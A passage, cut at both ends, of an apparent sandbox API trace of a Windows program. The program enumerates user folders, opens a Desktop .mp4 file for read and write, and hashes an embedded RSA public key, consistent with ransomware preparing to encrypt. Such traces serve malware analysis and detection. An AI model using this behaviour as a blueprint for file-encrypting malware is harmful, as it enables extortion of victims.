| out: hHeap=0x2c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eda8 | out: hHeap=0x2c0000) returned 1 [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.506] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0196.506] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea2f0 [0196.506] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0196.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.506] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.507] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.507] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.507] PathFindFileNameW (pszPath="") returned="" [0196.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eda8 [0196.507] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0196.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0196.508] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0196.509] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0196.509] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0196.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0196.509] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0196.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.510] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\") returned="5Ctq03jfOkJI397\\" [0196.510] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\") returned="YnPBSI277\\" [0196.510] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0196.510] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.510] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.511] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.511] PathFindFileNameW (pszPath="") returned="" [0196.511] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4893000, ftCreationTime.dwHighDateTime=0x1d89a17, ftLastAccessTime.dwLowDateTime=0xa587b860, ftLastAccessTime.dwHighDateTime=0x1d89a86, ftLastWriteTime.dwLowDateTime=0xa587b860, ftLastWriteTime.dwHighDateTime=0x1d89a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0196.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4893000, ftCreationTime.dwHighDateTime=0x1d89a17, ftLastAccessTime.dwLowDateTime=0xa587b860, ftLastAccessTime.dwHighDateTime=0x1d89a86, ftLastWriteTime.dwLowDateTime=0xa587b860, ftLastWriteTime.dwHighDateTime=0x1d89a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.514] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760c26e0, ftCreationTime.dwHighDateTime=0x1d89c0f, ftLastAccessTime.dwLowDateTime=0x1ca60480, ftLastAccessTime.dwHighDateTime=0x1d89da0, ftLastWriteTime.dwLowDateTime=0x1ca60480, ftLastWriteTime.dwHighDateTime=0x1d89da0, nFileSizeHigh=0x0, nFileSizeLow=0x4e1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adViIyse_4wpfxq.mp4", cAlternateFileName="ADVIIY~1.MP4")) returned 1 [0196.514] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\adViIyse_4wpfxq.mp4") returned=".mp4" [0196.515] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\adViIyse_4wpfxq.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\adviiyse_4wpfxq.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.516] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=19998) returned 1 [0196.516] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.519] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4df8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.519] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.521] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.521] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x4e1e, lpOverlapped=0x0) returned 1 [0196.522] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.522] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.522] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.522] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0196.523] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.523] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.523] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.523] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.523] GetLastError () returned 0x0 [0196.523] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0196.523] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0196.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.524] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.524] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.524] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4e20) returned 0x2af5168 [0196.524] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea2f0 [0196.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea338 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.525] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6620 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.528] GetCurrentThreadId () returned 0x5d8 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af1fa0 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.529] GetCurrentThreadId () returned 0x5d8 [0196.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 